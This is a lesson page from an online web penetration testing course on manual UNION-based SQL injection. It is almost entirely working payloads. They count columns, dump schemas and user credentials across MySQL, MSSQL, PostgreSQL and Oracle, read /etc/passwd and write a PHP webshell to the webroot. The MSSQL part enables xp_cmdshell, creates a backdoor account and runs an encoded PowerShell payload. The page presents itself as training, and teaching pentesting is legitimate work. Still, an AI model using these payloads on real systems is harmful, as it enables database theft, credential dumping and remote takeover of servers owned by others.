Web Application Penetration Testing Complete Masterclass

🌐 Web Pentest · Both Beginner 16 modules 2.7h 0 enrolled

From zero-knowledge to professional-grade tester. Every attack explained step-by-step with real payloads, full methodology, beginner mindset guidance, and a complete corporate pentest report at the end.

Instructor

lazyhackers

Curriculum — 5 sections · 16 modules · 2.7h

Now Learning

Manual SQLi Exploitation — UNION Attacks

Lesson · 10 min

← Prev Next →

UNION-based injection lets you retrieve data from other tables by appending your own SELECT statement. Most powerful and common SQLi exploitation technique.

Step 1 — Find Number of Columns

# Method 1: ORDER BY (increment until error appears)
?id=1' ORDER BY 1--   # No error
?id=1' ORDER BY 2--   # No error  
?id=1' ORDER BY 3--   # No error
?id=1' ORDER BY 4--   # ERROR = 3 columns total

# Method 2: UNION SELECT with NULLs (add NULLs until no error)
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--    # No error = 3 columns confirmed

Step 2 — Find Printable Columns

# Replace nulls one-by-one with a string to find which columns display on page
' UNION SELECT 'INJECT_TEST_1',NULL,NULL--
' UNION SELECT NULL,'INJECT_TEST_2',NULL--
' UNION SELECT NULL,NULL,'INJECT_TEST_3'--
# Look for INJECT_TEST_x in the page response
# Column 2 appears on page → inject all data through column 2

Step 3 — Extract Database Information

# ── MYSQL ──────────────────────────────────────────────────────
# Get current user, version, database name
' UNION SELECT user(),version(),database()--

# List all databases
' UNION SELECT schema_name,NULL,NULL FROM information_schema.schemata--

# List tables in current database
' UNION SELECT table_name,NULL,NULL FROM information_schema.tables WHERE table_schema=database()--

# List columns in a specific table
' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--

# Dump credentials
' UNION SELECT username,password,email FROM users--

# Concatenate if only one printable column
' UNION SELECT CONCAT(username,':',password),NULL,NULL FROM users--

# ── MSSQL ──────────────────────────────────────────────────────
' UNION SELECT @@version,NULL,NULL--
' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--

# ── POSTGRESQL ─────────────────────────────────────────────────
' UNION SELECT version(),NULL,NULL--
' UNION SELECT usename,passwd,NULL FROM pg_shadow--   # Requires superuser

# ── ORACLE ─────────────────────────────────────────────────────
' UNION SELECT NULL,NULL FROM dual--   # Oracle needs FROM dual
' UNION SELECT table_name,NULL FROM all_tables--
' UNION SELECT username,password FROM dba_users--

Step 4 — File Read & Webshell (MySQL)

# Read local file (requires FILE privilege)
' UNION SELECT load_file('/etc/passwd'),NULL,NULL--
' UNION SELECT load_file('C:/Windows/win.ini'),NULL,NULL--

# Write webshell to disk (requires write permission to webroot)
' UNION SELECT '<?php system(["cmd"]); ?>',NULL,NULL
  INTO OUTFILE '/var/www/html/shell.php'--

# Access your webshell
curl https://target.com/shell.php?cmd=id

MSSQL — OS Command Execution via xp_cmdshell

# Enable xp_cmdshell (requires sysadmin privilege)
'; EXEC sp_configure 'show advanced options',1; RECONFIGURE;--
'; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;--

# Execute OS commands
'; EXEC xp_cmdshell('whoami');--
'; EXEC xp_cmdshell('net user hacker P@ss123! /add');--
'; EXEC xp_cmdshell('powershell -enc BASE64_ENCODED_PAYLOAD');--

📄

The Pentester Mindset

Lesson · 10m ·Free Preview